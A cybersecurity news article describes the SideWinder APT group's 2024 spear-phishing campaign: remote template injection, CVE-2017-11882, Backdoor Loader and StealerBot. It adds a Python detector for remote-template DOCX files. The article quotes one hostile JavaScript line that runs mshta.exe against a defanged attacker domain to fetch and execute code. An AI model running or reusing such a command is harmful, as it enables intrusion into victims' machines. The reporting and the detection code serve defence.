SideWinder APT Group Attacking Military & Government Entities With New Tools

Cybersecurity researchers have identified intensified activity from the SideWinder APT group throughout 2024, with significant updates to their toolset and expanded targeting beyond traditional military and government entities.

Recent findings reveal that SideWinder has developed a massive new infrastructure to distribute malware and control compromised systems, with a notable increase in attacks against maritime infrastructures, logistics companies, and entities related to nuclear energy.

SideWinder’s operations have extended geographically to include targets across South Asia, Southeast Asia, the Middle East, and Africa. The group has demonstrated a particular interest in targets within Egypt following earlier campaigns focused on Djibouti.

Affected countries include Austria, Bangladesh, Cambodia, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, UAE, and Vietnam, among others.

Researchers at Securelist note that SideWinder continuously improves its toolset to evade security software detection, extend persistence on compromised networks, and conceal its presence.

The group responds rapidly to detection of their tools, often generating modified malware versions within five hours of discovery.

This level of agility and sophistication makes the threat actor particularly dangerous despite their reliance on older exploitation techniques.

The primary infection vector remains consistent with previous campaigns, using spear-phishing emails containing weaponized documents.

Malicious documents related to nuclear power plants and energy (Source – Securelist)

These documents employ themes related to nuclear power plants, maritime infrastructures, governmental decisions, or diplomatic issues to trick victims into opening malicious attachments.

Attack Chain

The infection process begins when targets open malicious DOCX files attached to spear-phishing emails.

These documents use remote template injection to download RTF files from attacker-controlled servers.

The RTF files exploit CVE-2017-11882, a known Microsoft Office vulnerability, to execute malicious shellcode.

This shellcode launches JavaScript via the mshtml.RunHTMLApplication function, as shown in the following code:

javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();")

Infection flow (Source – Securelist)

The JavaScript loader checks the system specifications and terminates if the machine has less than 950 MB of RAM (a sandbox check); otherwise it proceeds to download additional components.

The attack chain ultimately installs the “Backdoor Loader” malware, which is sideloaded using legitimate signed applications.

This loader then deploys the “StealerBot” implant, a sophisticated post-exploitation toolkit used exclusively by SideWinder.

The latest variants of the Backdoor Loader have been distributed under various filenames, including JetCfg.dll, policymanager.dll, winmm.dll, xmllite.dll, dcntel.dll, and UxTheme.dll.

These new malware variants feature enhanced anti-analysis code and employ Control Flow Flattening more extensively to evade detection, highlighting the group’s continued evolution and technical sophistication.
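The first stage of the chain described above, a DOCX that pulls its template from a remote server, leaves a static artifact that can be checked before the document is ever opened: an attachedTemplate relationship in word/_rels/settings.xml.rels with TargetMode="External" and a target on an http(s) or UNC location. The Python below is an added example written for this article, not code from Securelist or from any SideWinder sample. It builds a constructed minimal .docx in memory (the template URL on attacker.invalid and the benign local Normal.dotm path are both placeholders), then scans the package for remote template references so that a mail gateway or sandbox pre-check can flag the document without rendering it.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace used by every .rels part in an Office Open XML package
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Word's relationship type for the template a document is attached to
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
# Only remote locations are treated as suspicious; file:/// paths to a local Normal.dotm are normal
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal .docx (hypothetical, not a real sample) whose settings.xml
    carries an attachedTemplate relationship pointing at template_target."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>',
        )
        z.writestr(
            "word/document.xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            "<w:body><w:p><w:r><w:t>Constructed lure text</w:t></w:r></w:p></w:body></w:document>",
        )
        z.writestr(
            "word/settings.xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>',
        )
        z.writestr(
            "word/_rels/settings.xml.rels",
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_target}" TargetMode="External"/></Relationships>',
        )
    return buf.getvalue()


def find_external_templates(docx_bytes: bytes) -> list:
    """Return (part name, target) for every external attachedTemplate relationship
    in any .rels part of the package, whatever part it hangs off."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Target", "")))
    return hits


def is_remote_template_doc(docx_bytes: bytes) -> bool:
    """True when the document will fetch its template from an http(s) or UNC location."""
    return any(REMOTE_TARGET.match(target) for _, target in find_external_templates(docx_bytes))


if __name__ == "__main__":
    # Placeholder locations, not indicators from the campaign
    lure = build_sample_docx("https://attacker.invalid/template.rtf")
    benign = build_sample_docx("file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm")
    print("lure:", find_external_templates(lure), "remote:", is_remote_template_doc(lure))
    print("benign:", find_external_templates(benign), "remote:", is_remote_template_doc(benign))
```

Remote templates on internal file servers are common in corporate environments, so a hit on an internal hostname is a triage lead rather than a verdict; a hit on an external hostname in an inbound attachment is the pattern this campaign relies on and is worth blocking at the gateway. Scanning every .rels part rather than only settings.xml.rels matters because the relationship can be attached to other parts, such as glossary or header parts.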

These findings show the importance of patching systems against even older vulnerabilities such as CVE-2017-11882, as sophisticated threat actors continue to leverage them in targeted campaigns against high-value sectors and critical infrastructure worldwide.


Tushar Subhra Dutta
Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology, and other news.